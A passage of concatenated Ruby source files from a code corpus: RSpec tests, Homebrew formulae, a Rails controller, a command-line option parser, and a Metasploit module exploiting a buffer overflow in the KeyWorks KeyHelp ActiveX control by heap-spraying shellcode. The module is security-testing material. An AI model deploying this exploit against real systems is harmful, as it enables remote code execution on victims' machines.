Puppet::Util::RDoc.expects(:puts).with("im a define\n").in_sequence(byline)
Puppet::Util::RDoc.expects(:puts).with("im a resource\n").in_sequence(byline)
# any other output must fail
Puppet::Util::RDoc.manifestdoc([my_fixture('basic.pp')])
end
end
end
end
| 35.496732 | 123 | 0.648683 |
288660f1a6c85798db953be17f3abc251a85ec57 | 617 | require File.dirname(__FILE__) + "/../spec_helper"
describe IceCube::StringBuilder do
describe :sentence do
it "should return empty string when none" do
expect(IceCube::StringBuilder.sentence([])).to eq("")
end
it "should return sole when one" do
expect(IceCube::StringBuilder.sentence(["1"])).to eq("1")
end
it "should split on and when two" do
expect(IceCube::StringBuilder.sentence(["1", "2"])).to eq("1 and 2")
end
it "should comma and when more than two" do
expect(IceCube::StringBuilder.sentence(["1", "2", "3"])).to eq("1, 2, and 3")
end
end
end
| 28.045455 | 83 | 0.640194 |
4a14741909bc7c79ea445f1803e44f0f9b463636 | 737 | describe 'POST api/v1/time_entries', type: :request do
let!(:user) { create(:user) }
subject { post api_v1_time_entries_path, params: params, headers: auth_headers, as: :json }
context 'with valid params' do
let(:params) { attributes_for(:time_entry) }
it 'creates the time entry' do
expect { subject }.to change(TimeEntry, :count).by(1)
end
it 'assigns the time_entry to the logged user' do
expect { subject }.to change { user.reload.time_entries.count }.by(1)
end
end
context 'with invalid params' do
let(:params) { { minutes: 300, date: Time.zone.today.to_s } }
it 'return bad request' do
subject
expect(response).to have_http_status(:bad_request)
end
end
end
| 27.296296 | 93 | 0.668928 |
91b98f382be66007c0ae6b125308662099b33946 | 576 | # -*- coding: utf-8 -*-
require 'rspec'
describe 'JRUBY-6863' do
let(:str) do
str = "あいうえおかきくけこ"
end
subject do
str.slice!(3..-1) # => "えおかきくけこ"
end
it 'String#index without args' do
# See http://jira.codehaus.org/browse/JRUBY-xxxx
expect(subject.index(/[^ ]/)).to eq(0)
end
it 'String#index with args' do
expect(subject.index(/[^ ]/, 2)).to eq(2)
end
it 'String#rindex without args' do
expect(subject.rindex(/[^ ]/)).to eq(6)
end
it 'String#rindex with args' do
expect(subject.rindex(/[^ ]/, 2)).to eq(2)
end
end
| 19.2 | 52 | 0.59375 |
611c6093c21d4aefbecd5604d51a542a239228be | 90 | require 'baseline/hooks/create_site_data_pages'
module Baseline
module Hooks
end
end
| 12.857143 | 47 | 0.811111 |
abf7b4246e6c5037ee71e0c64054824903c4fe7c | 4,301 | class ErlangAT21 < Formula
desc "Programming language for highly scalable real-time systems"
homepage "https://www.erlang.org/"
# Download tarball from GitHub; it is served faster than the official tarball.
url "https://github.com/erlang/otp/archive/OTP-21.3.8.18.tar.gz"
sha256 "3481a47503e1ac0c0296970b460d1936ee0432600f685a216608e04b2f608367"
license "Apache-2.0"
livecheck do
url :stable
regex(/^OTP[._-]v?(21(?:\.\d+)+)$/i)
end
bottle do
sha256 cellar: :any, catalina: "a45826787cfb9307d0c154eb70c5148546c02cab2791a5912568dcdc4e5645ef"
sha256 cellar: :any, mojave: "7bb6af1d1169b82bb631434d826bfbf86cf03cadb669076644710d925e596d56"
sha256 cellar: :any, high_sierra: "5ca5113bc1e1f7ccefc85b36039f8bc35f4f30c1534d3928c867afe2355d53b6"
sha256 cellar: :any, x86_64_linux: "a900ccbfb6c724dda441bbce7752b24ad1f78bc9030348ad503e226f0b849c31"
end
keg_only :versioned_formula
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on arch: :x86_64
depends_on "[email protected]"
depends_on "wxmac" # for GUI apps like observer
uses_from_macos "m4" => :build
resource "man" do
url "https://www.erlang.org/download/otp_doc_man_21.3.tar.gz"
mirror "https://fossies.org/linux/misc/otp_doc_man_21.3.tar.gz"
sha256 "f5464b5c8368aa40c175a5908b44b6d9670dbd01ba7a1eef1b366c7dc36ba172"
end
resource "html" do
url "https://www.erlang.org/download/otp_doc_html_21.3.tar.gz"
mirror "https://fossies.org/linux/misc/otp_doc_html_21.3.tar.gz"
sha256 "258b1e0ed1d07abbf08938f62c845450e90a32ec542e94455e5d5b7c333da362"
end
# Fix build on Xcode 11.4+ (https://bugs.erlang.org/browse/ERL-1205)
patch do
url "https://github.com/erlang/otp/commit/3edba0dad391431cbadad44a8bd15c75254fc239.patch?full_index=1"
sha256 "0c82d9f3bdb668ba78025988c9447bebe91a2f6bb00daa7f0ae7bd1916cd9bfd"
end
# Fix build on Xcode 12+ (https://bugs.erlang.org/browse/ERL-1306)
patch do
url "https://github.com/erlang/otp/commit/388622e9b626039c1e403b4952c2c905af364a96.patch?full_index=1"
sha256 "85d3611fc071f06d421b9c7fae00b656fde054586bf69551aec38930d4086780"
end
def install
# Unset these so that building wx, kernel, compiler and
# other modules doesn't fail with an unintelligible error.
%w[LIBS FLAGS AFLAGS ZFLAGS].each { |k| ENV.delete("ERL_#{k}") }
# Do this if building from a checkout to generate configure
system "./otp_build", "autoconf" if File.exist? "otp_build"
args = %W[
--disable-debug
--disable-silent-rules
--prefix=#{prefix}
--enable-dynamic-ssl-lib
--enable-hipe
--enable-sctp
--enable-shared-zlib
--enable-smp-support
--enable-threads
--enable-wx
--with-ssl=#{Formula["[email protected]"].opt_prefix}
--without-javac
]
on_macos do
args << "--enable-darwin-64bit"
args << "--enable-kernel-poll" if MacOS.version > :el_capitan
args << "--with-dynamic-trace=dtrace" if MacOS::CLT.installed?
end
system "./configure", *args
system "make"
system "make", "install"
(lib/"erlang").install resource("man").files("man")
doc.install resource("html")
end
def caveats
<<~EOS
Man pages can be found in:
#{opt_lib}/erlang/man
Access them with `erl -man`, or add this directory to MANPATH.
EOS
end
test do
system "#{bin}/erl", "-noshell", "-eval", "crypto:start().", "-s", "init", "stop"
(testpath/"factorial").write <<~EOS
#!#{bin}/escript
%% -*- erlang -*-
%%! -smp enable -sname factorial -mnesia debug verbose
main([String]) ->
try
N = list_to_integer(String),
F = fac(N),
io:format("factorial ~w = ~w\n", [N,F])
catch
_:_ ->
usage()
end;
main(_) ->
usage().
usage() ->
io:format("usage: factorial integer\n").
fac(0) -> 1;
fac(N) -> N * fac(N-1).
EOS
chmod 0755, "factorial"
assert_match "usage: factorial integer", shell_output("./factorial")
assert_match "factorial 42 = 1405006117752879898543142606244511569936384000000000", shell_output("./factorial 42")
end
end
| 32.832061 | 118 | 0.671239 |
1a18e4692b6805c68c3916919585218d46134bbd | 9,251 | require "danger/danger_core/executor"
# If you cannot find a method, please check spec/support/ci_helper.rb.
RSpec.describe Danger::Executor, use: :ci_helper do
describe "#validate!" do
context "with CI + is a PR" do
it "not raises error on Bamboo" do
with_bamboo_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Bitrise" do
with_bitrise_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Buildkite" do
with_buildkite_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Circle" do
with_circle_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Codefresh" do
with_codefresh_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Drone" do
with_drone_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on GitLab CI" do
with_gitlabci_setup_and_is_a_merge_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Jenkins (GitHub)" do
with_jenkins_setup_github_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Jenkins (GitLab)" do
with_jenkins_setup_gitlab_and_is_a_merge_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Jenkins (GitLab v3)" do
with_jenkins_setup_gitlab_v3_and_is_a_merge_request do |system_env|
expect { described_class.new(system_env).validate!(testing_ui) }.not_to raise_error
end
end
it "not raises error on Local Git Repo" do
with_localgitrepo_setup do |system_env|
ui = testing_ui
expect { described_class.new(system_env).validate!(ui) }.to raise_error(SystemExit)
expect(ui.string).to include("Not a LocalGitRepo Pull Request - skipping `danger` run")
end
end
it "not raises error on Screwdriver" do
with_screwdriver_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on Semaphore" do
with_semaphore_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on Surf" do
with_surf_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on TeamCity (GitLab)" do
with_teamcity_setup_github_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on TeamCity (GitLab)" do
with_teamcity_setup_gitlab_and_is_a_merge_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on Travis" do
with_travis_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
it "not raises error on Xcode Server" do
with_xcodeserver_setup_and_is_a_pull_request do |system_env|
expect { described_class.new(system_env) }.not_to raise_error
end
end
end
context "without CI" do
it "raises error with clear message" do
we_dont_have_ci_setup do |system_env|
expect { described_class.new(system_env).run }.to \
raise_error(SystemExit, /Could not find the type of CI for Danger to run on./)
end
end
end
context "NOT a PR" do
it "exits with clear message" do
not_a_pull_request do |system_env|
ui = testing_ui
expect { described_class.new(system_env).validate!(ui) }.to raise_error(SystemExit)
expect(ui.string).to include("Not a Travis Pull Request - skipping `danger` run")
end
end
it "raises error on GitLab CI" do
with_gitlabci_setup_and_is_not_a_merge_request do |system_env|
ui = testing_ui
expect { described_class.new(system_env).validate!(ui) }.to raise_error(SystemExit)
expect(ui.string).to include("Not a GitLabCI Merge Request - skipping `danger` run")
end
end
end
end
context "a test for SwiftWeekly #89" do
class FakeProse
attr_accessor :ignored_words
def lint_files
true
end
def check_spelling
true
end
end
module Danger
class Dangerfile
def prose
FakeProse.new
end
end
end
let!(:project_root) { Dir.pwd }
def prepare_fake_swiftweekly_repository(dir)
head_sha = base_sha = nil
Dir.chdir dir do
`echo "# SwiftWeekly" >> README.md`
`mkdir _drafts _posts`
FileUtils.cp "#{project_root}/spec/fixtures/github/Dangerfile", dir
`git init`
`git add .`
`git commit -m "first commit"`
`git remote add origin [email protected]:SwiftWeekly/swiftweekly.github.io.git`
# Create 2016-09-15-issue-38.md
`git checkout -b jp-issue-38 --quiet`
IO.write("_drafts/2016-09-15-issue-38.md", "init 2016-09-15-issue-38.md")
`git add _drafts/2016-09-15-issue-38.md`
`git commit -m "flesh out issue 38 based on suggestions from #75, #79"`
# Update 2016-09-15-issue-38.md
IO.write("_drafts/2016-09-15-issue-38.md", "update 2016-09-15-issue-38.md")
`git add _drafts/2016-09-15-issue-38.md`
`git commit -m "address first round of review feedback"`
# Move 2016-09-15-issue-38.md from _drafts/ to _posts/
`git mv _drafts/2016-09-15-issue-38.md _posts/2016-09-15-issue-38.md`
`git add .`
`git commit -m "move issue 38 to _posts"`
shas = `git log --oneline`.scan(/\b[0-9a-f]{5,40}\b/)
head_sha = shas.first
base_sha = shas.last
end
[head_sha, base_sha]
end
def pretend_we_are_in_the_travis
approval = ENV["HAS_JOSH_K_SEAL_OF_APPROVAL"]
pr = ENV["TRAVIS_PULL_REQUEST"]
slug = ENV["TRAVIS_REPO_SLUG"]
api_token = ENV["DANGER_GITHUB_API_TOKEN"]
ENV["HAS_JOSH_K_SEAL_OF_APPROVAL"] = "true"
ENV["TRAVIS_PULL_REQUEST"] = "42"
ENV["TRAVIS_REPO_SLUG"] = "danger/danger"
ENV["DANGER_GITHUB_API_TOKEN"] = "1234567890" * 4 # octokit token is of size 40
yield
ensure
ENV["HAS_JOSH_K_SEAL_OF_APPROVAL"] = approval
ENV["TRAVIS_PULL_REQUEST"] = pr
ENV["TRAVIS_REPO_SLUG"] = slug
api_token = api_token
end
def to_json(raw)
JSON.parse(raw)
end
def swiftweekly_pr_89_as_json(head_sha, base_sha)
pr_json = to_json(IO.read("#{project_root}/spec/fixtures/github/swiftweekly.github.io-pulls-89.json"))
pr_json["base"]["sha"] = base_sha
pr_json["head"]["sha"] = head_sha
pr_json
end
def swiftweekly_issues_89_as_json
to_json(IO.read("#{project_root}/spec/fixtures/github/swiftweekly.github.io-issues-89.json"))
end
def swiftweekly_issue_89_comments_as_json
to_json(IO.read("#{project_root}/spec/fixtures/github/swiftweekly.github.io-issues-89-comments.json"))
end
it "works" do
Dir.mktmpdir do |dir|
Dir.chdir dir do
head_sha, base_sha = prepare_fake_swiftweekly_repository(dir)
fake_client = double("Octokit::Client")
allow(Octokit::Client).to receive(:new) { fake_client }
allow(fake_client).to receive(:pull_request) { swiftweekly_pr_89_as_json(head_sha, base_sha) }
allow(fake_client).to receive(:get) { swiftweekly_issues_89_as_json }
allow(fake_client).to receive(:issue_comments) { swiftweekly_issue_89_comments_as_json }
allow(fake_client).to receive(:delete_comment) { true }
allow(fake_client).to receive(:create_status) { true }
pretend_we_are_in_the_travis do
Danger::Executor.new(ENV).run(dangerfile_path: "Dangerfile")
end
end
end
end
after do
module Danger
class Dangerfile
undef_method :prose
end
end
end
end
end
| 34.011029 | 108 | 0.658307 |
212fd26a4b1578a77fc6e871789a3e497291dfd8 | 1,186 | require File.expand_path("../../Abstract/abstract-php-extension", __FILE__)
class Php55Couchbase < AbstractPhp55Extension
init
homepage "https://pecl.php.net/package/couchbase"
desc "Provides fast access to documents stored in a Couchbase Server."
url "https://pecl.php.net/get/couchbase-2.0.7.tgz"
sha256 "0482757d6b29ec5b9c957b053203a75410ced519f2407e666f7ca5c180a66ff5"
head "https://github.com/couchbaselabs/php-couchbase.git"
bottle do
sha256 "cf7dd3612e37ba67a2e00f6381052017548d4b2939784d1fd87f867e1321f388" => :yosemite
sha256 "f1385be6ab91caa356c3fcb3e58c60f4214da04242b053b9bc9ea63f1f01a5bf" => :mavericks
sha256 "4f136d35d416969c954fd31b998b8d0828684e8b2904deb2b8ee17b1db180a49" => :mountain_lion
end
option "with-igbinary", "Build with igbinary support"
depends_on "libcouchbase"
def install
Dir.chdir "couchbase-#{version}" unless build.head?
ENV.universal_binary if build.universal?
args = []
args << "--prefix=#{prefix}"
args << phpconfig
safe_phpize
system "./configure", *args
system "make"
prefix.install "modules/couchbase.so"
write_config_file if build.with? "config-file"
end
end
| 31.210526 | 95 | 0.757167 |
032ef3c7444a9b28061f5fbd8143e1f60b94d3aa | 744 | require 'spec_helper'
@os_facts
base_resources = YAML.load_file(File.dirname(__FILE__) + '/../resources/base_resources.yaml')
tpinstalls = base_resources['tp__install']
describe 'sensu.lab.psick.io' do
on_supported_os.each do |os, facts|
context "on #{os}" do
let(:facts) do
OS_FACTS.merge(facts)
end
let(:environment) { 'production' }
let(:trusted_facts) do
{
'env' => 'lab',
'zone' => 'lab',
'datacenter' => 'lab',
'role' => 'sensu'
}
end
it { is_expected.to compile.with_all_deps }
tpinstalls.each do | tpinstall |
it { is_expected.to contain_tp__install(tpinstall).with_ensure('present') }
end
end
end
end
| 25.655172 | 93 | 0.596774 |
33204d3635207f826255fb263cea6be1500ed299 | 3,307 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control
(KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's
Documentation ApplicationXtender 5.4.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '58423'],
[ 'BID', '36546' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Sep 29 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
html = %Q|
<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('KeyHelp.KeyCtrl.1');
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 4024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.JumpURL(1, #{rand8}, "#{vname}");
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(html)
end
end
| 29.526786 | 98 | 0.573632 |
265d972fb2ece75e391d40ce946cf8cc6eab0cf9 | 1,203 | class Ddgr < Formula
include Language::Python::Shebang
desc "DuckDuckGo from the terminal"
homepage "https://github.com/jarun/ddgr"
url "https://github.com/jarun/ddgr/archive/v1.8.1.tar.gz"
sha256 "d223a3543866e44e4fb05df487bd3eb23d80debc95f116493ed5aad0d091149e"
license "GPL-3.0"
bottle do
cellar :any_skip_relocation
sha256 "ba751df7de76dd4c286e8502cf5e46f406f1e6b1467689f98158bc92f7df42b2" => :catalina
sha256 "ba751df7de76dd4c286e8502cf5e46f406f1e6b1467689f98158bc92f7df42b2" => :mojave
sha256 "ba751df7de76dd4c286e8502cf5e46f406f1e6b1467689f98158bc92f7df42b2" => :high_sierra
sha256 "b8c024c062ce3af6dc579bf931c0e8e1b6d5d109d54068ef69f70d14e6ba64bf" => :x86_64_linux
end
depends_on "[email protected]"
def install
rewrite_shebang detected_python_shebang, "ddgr"
system "make", "install", "PREFIX=#{prefix}"
bash_completion.install "auto-completion/bash/ddgr-completion.bash"
fish_completion.install "auto-completion/fish/ddgr.fish"
zsh_completion.install "auto-completion/zsh/_ddgr"
end
test do
ENV["PYTHONIOENCODING"] = "utf-8"
assert_match "q:Homebrew", shell_output("#{bin}/ddgr --debug --noprompt Homebrew 2>&1")
end
end
| 36.454545 | 94 | 0.773067 |
7af165b68a72d0b3e47071d3a8892063f2dbce76 | 711 | # frozen_string_literal: true
class AbrahamHistoriesController < ApplicationController
def create
@abraham_history = AbrahamHistory.new(abraham_history_params)
@abraham_history.creator_id = current_account.id
respond_to do |format|
if @abraham_history.save
format.json { render json: @abraham_history, status: :created }
else
format.json { render json: @abraham_history.errors, status: :unprocessable_entity }
end
end
end
private
# Never trust parameters from the scary internet, only allow the white list through.
def abraham_history_params
params.require(:abraham_history).permit(:controller_name, :action_name, :tour_name)
end
end
| 30.913043 | 91 | 0.73699 |
ff77b29d8960fc5f6158f03592797393a52e5b95 | 54,928 | # -*- coding: utf-8 -*-
require 'json'
require 'net/imap'
require 'optparse'
require 'pp'if $DEBUG
require 'riser'
require 'yaml'
OptionParser.accept(JSON) do |json_data, *_|
begin
JSON.load(json_data)
rescue
raise OptionParser::InvalidArgument, json_data
end
end
module RIMS
module Cmd
CMDs = {}
def self.command_function(method_name, description)
module_function(method_name)
method_name = method_name.to_s
unless (method_name =~ /\A cmd_/x) then
raise "invalid command function name: #{method_name}"
end
cmd_name = $'.gsub(/_/, '-')
CMDs[cmd_name] = { function: method_name.to_sym, description: description }
end
def run_cmd(args)
options = OptionParser.new
if (args.empty?) then
cmd_help(options, args)
return 1
end
cmd_name = args.shift
pp cmd_name if $DEBUG
pp args if $DEBUG
cmd_entry = CMDs[cmd_name] or raise "unknown command: #{cmd_name}. Run `#{options.program_name} help'."
options.program_name += " #{cmd_name}"
send(cmd_entry[:function], options, args)
end
module_function :run_cmd
def cmd_help(options, args)
show_debug_command = false
options.on('--show-debug-command', 'Show command for debug in help message. At default, debug command is hidden.') do
show_debug_command = true
end
options.parse!(args)
puts "usage: #{File.basename($0)} command options"
puts ""
puts "commands:"
w = CMDs.keys.map{|k| k.length }.max + 4
fmt = " %- #{w}s%s"
CMDs.sort_by{|cmd_name, _| cmd_name }.each do |cmd_name, cmd_entry|
if ((! show_debug_command) && (cmd_name =~ /\A debug/x)) then
next
end
puts format(fmt, cmd_name, cmd_entry[:description])
end
puts ""
puts "command help options:"
puts " -h, --help"
0
end
command_function :cmd_help, "Show this message."
def cmd_version(options, args)
options.parse!(args)
puts RIMS::VERSION
0
end
command_function :cmd_version, 'Show software version.'
class ServiceConfigChainBuilder
def initialize
@build = proc{ Service::Configuration.new }
end
def chain(&block)
parent = @build
@build = proc{ block.call(parent.call) }
self
end
def call
@build.call
end
end
def make_service_config(options)
build = ServiceConfigChainBuilder.new
build.chain{|c| c.load(base_dir: Dir.getwd) }
options.summary_width = 37
log_level_list = %w[ debug info warn error fatal unknown ]
options.on('-h', '--help', 'Show this message.') do
puts options
exit
end
options.on('-f', '--config-yaml=CONFIG_FILE',
String,
"Load optional parameters from CONFIG_FILE."
) do |path|
build.chain{|c| c.load_yaml(path) }
end
options.on('-r', '--required-feature=FEATURE',
String,
"Add required feature."
) do |feature|
require(feature)
build.chain{|c| c.load(required_features: [ feature ]) }
end
options.on('-d', '--base-dir=DIR',
String,
"Directory that places log file, mailbox database, etc. default is current directory."
) do |path|
build.chain{|c| c.load(base_dir: path) }
end
options.on('--log-file=FILE',
String,
"Name of log file. default is `#{Service::DEFAULT_CONFIG.make_file_logger_params[0]}'."
) do |path|
build.chain{|c|
c.load(logger: {
file: {
path: path
}
})
}
end
options.on('-l', '--log-level=LEVEL',
log_level_list,
"Logging level (#{log_level_list.join(' ')}). default is `" +
Service::DEFAULT_CONFIG.make_file_logger_params[-1][:level] +
"'."
) do |level|
build.chain{|c|
c.load(logging: {
file: {
level: level
}
})
}
end
options.on('--log-shift-age=NUMBER',
Integer,
'Number of old log files to keep.'
) do |num|
build.chain{|c|
c.load(logging: {
file: {
shift_age: num
}
})
}
end
options.on('--log-shift-age-daily',
'Frequency of daily log rotation.'
) do
build.chain{|c|
c.load(logger: {
file: {
shift_age: 'daily'
}
})
}
end
options.on('--log-shift-age-weekly',
'Frequency of weekly log rotation.'
) do
build.chain{|c|
c.load(logger: {
file: {
shift_age: 'weekly'
}
})
}
end
options.on('--log-shift-age-monthly',
'Frequency of monthly log rotation.'
) do
build.chain{|c|
c.load(logger: {
file: {
shift_age: 'monthly'
}
})
}
end
options.on('--log-shift-size=SIZE',
Integer,
'Maximum logfile size.'
) do |size|
build.chain{|c|
c.load(logger: {
file: {
shift_size: size
}
})
}
end
options.on('-v', '--log-stdout=LEVEL',
log_level_list + %w[ quiet ],
"Stdout logging level (#{(log_level_list + %w[ quiet ]).join(' ')}). default is `" +
Service::DEFAULT_CONFIG.make_stdout_logger_params[-1][:level] +
"'."
) do |level|
if (level == 'quiet') then
level = 'unknown'
end
build.chain{|c|
c.load(logging: {
stdout: {
level: level
}
})
}
end
options.on('--protocol-log-file=FILE',
String,
"Name of log file. default is `#{Service::DEFAULT_CONFIG.make_protocol_logger_params[0]}'."
) do |path|
build.chain{|c|
c.load(logger: {
protocol: {
path: path
}
})
}
end
options.on('-p', '--protocol-log-level=LEVEL',
log_level_list,
"Logging level (#{log_level_list.join(' ')}). default is `" +
Service::DEFAULT_CONFIG.make_protocol_logger_params[-1][:level] +
"'."
) do |level|
build.chain{|c|
c.load(logging: {
protocol: {
level: level
}
})
}
end
options.on('--protocol-log-shift-age=NUMBER',
Integer,
'Number of old log files to keep.'
) do |num|
build.chain{|c|
c.load(logging: {
protocol: {
shift_age: num
}
})
}
end
options.on('--protocol-log-shift-age-daily',
'Frequency of daily log rotation.'
) do
build.chain{|c|
c.load(logger: {
protocol: {
shift_age: 'daily'
}
})
}
end
options.on('--protocol-log-shift-age-weekly',
'Frequency of weekly log rotation.'
) do
build.chain{|c|
c.load(logger: {
protocol: {
shift_age: 'weekly'
}
})
}
end
options.on('--protocol-log-shift-age-monthly',
'Frequency of monthly log rotation.'
) do
build.chain{|c|
c.load(logger: {
protocol: {
shift_age: 'monthly'
}
})
}
end
options.on('--protocol-log-shift-size=SIZE',
Integer,
'Maximum logfile size.'
) do |size|
build.chain{|c|
c.load(logger: {
protocol: {
shift_size: size
}
})
}
end
options.on('--[no-]daemonize',
"Daemonize server process. effective only with daemon command."
) do |daemonize|
build.chain{|c|
c.load(daemon: {
daemonize: daemonize
})
}
end
options.on('--[no-]daemon-debug',
"Debug daemon. effective only with daemon command."
) do |debug|
build.chain{|c|
c.load(daemon: {
debug: debug
})
}
end
options.on('--daemon-umask=UMASK',
Integer,
"Umask(2). effective only with daemon command. default is `#{'%04o' % Service::DEFAULT_CONFIG.daemon_umask}'."
) do |umask|
build.chain{|c|
c.load(daemon: {
umask: umask
})
}
end
options.on('--status-file=FILE',
String,
"Name of status file. effective only with daemon command. default is `#{Service::DEFAULT_CONFIG.status_file}'."
) do |path|
build.chain{|c|
c.load(daemon: {
status_file: path
})
}
end
options.on('--privilege-user=USER',
String,
"Privilege user name or ID for server process. effective only with daemon command."
) do |user|
build.chain{|c|
c.load(daemon: {
server_privileged_user: user
})
}
end
options.on('--privilege-group=GROUP',
String,
"Privilege group name or ID for server process. effective only with daemon command."
) do |group|
build.chain{|c|
c.load(daemon: {
server_privileged_group: group
})
}
end
options.on('-s', '--listen=HOST_PORT',
String,
"Listen socket address. default is `#{Service::DEFAULT_CONFIG.listen_address}'"
) do |host_port|
build.chain{|c|
c.load(server: {
listen_address: host_port
})
}
end
options.on('--accept-polling-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(server: {
accept_polling_timeout_seconds: seconds
})
}
end
options.on('--process-num=NUMBER',
Integer
) do |num|
build.chain{|c|
c.load(server: {
process_num: num
})
}
end
options.on('--process-queue-size=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(server: {
process_queue_size: size
})
}
end
options.on('--process-queue-polling-timeout=SECONDS',
Float) do |seconds|
build.chain{|c|
c.load(server: {
process_queue_polling_timeout_seconds: seconds
})
}
end
options.on('--process-send-io-polling-timeout=SECONDS',
Float) do |seconds|
build.chain{|c|
c.load(server: {
process_send_io_polling_timeout_seconds: seconds
})
}
end
options.on('--thread-num=NUMBER',
Integer
) do |num|
build.chain{|c|
c.load(server: {
thread_num: num
})
}
end
options.on('--thread-queue-size=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(server: {
thread_queue_size: size
})
}
end
options.on('--thread-queue-polling-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(server: {
thread_queue_polling_timeout_seconds: seconds
})
}
end
options.on('--send-buffer-limit=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(connection: {
send_buffer_limit_size: size
})
}
end
options.on('--read-polling-interval=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(connection: {
read_polling_interval_seconds: seconds
})
}
end
options.on('--command-wait-timeout=SECONDS',
Float
) do |seconds|
build.chain{|c|
c.load(connection: {
command_wait_timeout_seconds: seconds
})
}
end
options.on('--line-length-limit=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(protocol: {
line_length_limit: size
})
}
end
options.on('--literal-size-limit=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(protocol: {
literal_size_limit: size
})
}
end
options.on('--command-size-limit=SIZE',
Integer
) do |size|
build.chain{|c|
c.load(protocol: {
command_size_limit: size
})
}
end
options.on('--[no-]use-default-charset-aliases'
) do |use_default_aliases|
build.chain{|c|
c.load(charset: {
use_default_aliases: use_default_aliases
})
}
end
options.on('--add-charset-alias=NAME_TO_ENCODING',
/\A \S+,\S+ \z/x,
"Set the alias name and encoding separated with comma (,)."
) do |name_to_encoding|
name, encoding = name_to_encoding.split(',', 2)
build.chain{|c|
c.load(charset: {
aliases: [
{ name: name, encoding: encoding }
]
})
}
end
options.on('--[no-]replace-charset-invalid'
) do |replace|
build.chain{|c|
c.load(charset: {
convert_options: {
replace_invalid_byte_sequence: replace
}
})
}
end
options.on('--[no-]replace-charset-undef'
) do |replace|
build.chain{|c|
c.load(charset: {
convert_options: {
